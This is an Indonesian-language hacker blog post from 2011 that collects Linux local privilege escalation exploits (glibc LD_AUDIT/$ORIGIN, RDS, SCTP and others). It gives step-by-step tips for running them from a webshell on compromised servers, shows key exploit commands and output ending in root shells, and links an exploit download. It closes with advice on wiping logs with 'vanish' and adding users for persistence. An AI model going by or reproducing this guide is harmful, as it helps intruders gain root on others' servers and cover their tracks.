31 JANUARY 2011 AT 4:46AM BY C4UR
###################################################
# #
# ,--^----------,--------,-----,-------^--, #
# | ||||||||| `--------' | O #
# `+---------------------------^----------| #
# `\_,-------, _________________________| #
# / XXXXXX /`| / #
# / XXXXXX / `\ / #
# / XXXXXX /\______( #
# / XXXXXX / #
# / XXXXXX / cucunya kongSANUN ^_^ #
# (________( BY c4uR #
# `------' qinoryy@yahoo.com #
# #
###################################################
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
GNU C library dynamic linker $ORIGIN expansion Vulnerability
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Author: Tavis Ormandy
http://www.exploit-db.com/exploits/15274/
2.12.1, FC13 <=== fedora
2.5, RHEL5 / CentOS5
http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt15500/15274-thumb.png
untuk xpl ini, langkah awal yg harus kita lakukan adalah
cek kesedian "gcc dan ln /bin/ping <===== via command webshell"
jika gcc dan ln /bin/ping nya sukses
maka w00t 85%
biasanya(jika gagal) mentok di bagian ini "gcc -w -fPIC -shared -o /tmp/exploit payload.c"
dan ini "LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3"
klo gw biasanya
klo mo eksekusi, make xpl ini
gw ubah direktorynya
defaulnya /tmp/exploit
misal, /home/user/public_html/shell
jadinya seperti ini, /home/user/public_html/shell/exploit
dan seterusnya
klo gw, biasanya make *.c(payload.c)nya dr shell
gambar ini menunjukan, xpl ini w00t 100%
http://oi51.tinypic.com/r1nbk3.jpg
http://oi54.tinypic.com/9b9kp0.jpg
gambar ini menunjukan, xpl ini w00t 95%
http://oi56.tinypic.com/2gy3720.jpg
gambar ini menunjukan, gatot =))
http://oi56.tinypic.com/2mn3wi8.jpg
fedora 32
http://oi54.tinypic.com/4sz2ud.jpg
mudah dan pahamkan :D
oh iyah, pk xpl ini gg w00t http://www.exploit-db.com/exploits/15024/(2618)
gambar² ntu :P
gw sih biasanya klo mo cek ap² di command webshell ajah
bentuk videonya
http://www.youtube.com/watch?v=BENgdFhON7w
Download xpl : http://islamiccenteremporia.org/.../xpl/xpl.tgz
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Linux RDS Protocol Local Privilege Escalation
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Author: Dan Rosenberg
http://www.exploit-db.com/exploits/15285/
http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt15500/15285.png
xpl 263x32 dan 263x64
w00t test on fedora,openSUSE dan ubuntu
fedora
http://oi52.tinypic.com/aphap0.jpg
ubuntu
http://oi54.tinypic.com/slk037.jpg
openSUSE
http://oi52.tinypic.com/opn5f8.jpg
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
GNU C library dynamic linker LD_AUDIT arbitrary DSO load Vulnerability
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Author: Tavis Ormandy
http://www.exploit-db.com/exploits/15304/
http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt15500/15304.png
2.12.1, FC13
2.5, RHEL5 / CentOS5
2.11.1, Ubuntu 10
klo di xpl ini, namanya
dpkg32 dan dpkg64
untuk file *.c nya bisa di liat disini
http://forum.devilzc0de.org/thread-4453.html
klo mau coba yg manual
langkah awal yaitu
ktik d command webshell kalian
dpkg, jika dpkg ada maka w00t 70%
bisanya mentok disini
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
debian 32 bit
http://oi52.tinypic.com/91cay8.jpg
debian 64 bit
http://oi56.tinypic.com/110kqjp.jpg
buntu 32 bit
http://oi53.tinypic.com/2wr2ro1.jpg
blom pernah w00t
klo nyoba centOS dan fedora, ntu gw :P
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
2.6.37 Local Privilege Escalation
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Author: Dan Rosenberg
http://www.exploit-db.com/exploits/15704/
http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt16000/
screen-shot-2010-12-07-at-72005-pm.png
masih anget ini xpl =))
test 32 bit
http://oi52.tinypic.com/35irwaw.jpg
64bitnya lom di test
xpl ini 2637x32 dan 2637x64
info
archives.neohapsis.com/archives/fulldisclosure/2010-12/0128.html
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
coded by: sgrakkyu <at> antifork.org
http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html
Tested on target:
Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)
Fedora Core 10 x86_64 (default installed kernel - without selinux)
./26x64
[**] Patching ring0 shellcode with userspace addr: 0x4017e0
[**] Using port: 25433
[**] Getting slab info...
[**] Mapping Segments...
[**] Trying mapping safe page...Page Protection Present (Unable to Map Safe Page)
[**] Mapping High Address Page (don't kill placeholder child)
[**] Mapping Code Page... Done
[**] Binding on CPU 0
[**] Start Server Thread..
...
...
...
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
[**] Umapped end-to-end fd: 212
[**] Unsafe fd: ( 210 224 214 212 )
[**] Hijacking fops...
[**] Migrate evil unsafe fds to child process..
[**] Child process 25463 _MUST_ NOT die..keep it alive:)
[**] Got root!
# id
uid=0(root) gid=0(root) groups=1001(anon)
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
CVE-2009-0065 Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
coded by: sgrakkyu <at> antifork.org
http://kernelbof.blogspot.com/2009/04/kernel-memory-corruptions-are-not-just.html
NOTE: you need at least one sctp application bound on the target box
Supported target:
Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server)
Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
Ubuntu 8.10 x86_64 (2.6.27_7-10 geenric/server)
Fedora Core 10 x86_64 (default installed kernel)
OpenSuse 11.1 x86_64 (default installed kernel)
./26sctp64 -H 192.168.200.1 -P 5555 -h 192.168.200.10 -p 20000 -s 15000 -c 700 -t fedora64_10-2.6.25-117
[**] Monitoring Network for TSN/VTAG pairs..
[**] Start flushing slub cache...
[**] Using TSN/VTAG pairs: (TSN: 28022e8 <=> VTAG: 41fdd4fb) / (TSN: 8cafd3ae <=> VTAG: 1a99396c)...
[**] Overwriting neightboard sctp map..
[**] Disabling Selinux Enforcing Mode..
[**] Overwriting neightboard sctp map ......
[**] Overwriting vsyscall shadow map..
[**] Hijacking vsyscall shadow map..
[**] Waiting daemons executing gettimeofday().. this can take up to one minute...
[**] ....
[**] Connected!
[**] Restoring vsys: Emulate gettimeofday()...
uid=0(root) gid=0(root) groups=51(smmsp) context=system_u:system_r:sendmail_t:s0
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
xpl ros132
http://oi56.tinypic.com/35i20bb.jpg
xpl 2618
http://www.youtube.com/watch?v=8bWUIQ55Wdw
xpl 263xxx64
http://www.youtube.com/watch?v=oct7p5hKdfU
xpl spender
http://www.youtube.com/watch?v=jQ-3yIwTmug
http://oi51.tinypic.com/334jbm0.jpg
chechk.sh
http://oi55.tinypic.com/fxcsh3.jpg
sock64
http://oi54.tinypic.com/2qk5qb5.jpg
sock32
http://oi51.tinypic.com/4ujrr7.jpg
redhat32
http://oi51.tinypic.com/21ca1k8.jpg
poc = securityfocus.com/archive/1/326337
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▌
▌ bisakan klo abis ngelocal gunakan
▌ vanish. basic bg gw 40% logica 60%.
▌ jagn pernah install sshdoor(sarangw)
▌ adduser bisa ajah udah cukup.
▌ semua xpl ini dah d uji cb
▌ tergantung kalian yg menjalaknnya.
▌ sblom d bind atw d bek-konak
▌ run dulu ajah xplnya d command webshell
▌ nanti juga tau sndiri
▌ sgini ajah dolo dan xpl ini akan update
▌ trus
▌ di mulailah dr versi yg rendah dulu
▌ apapun itu jenisnya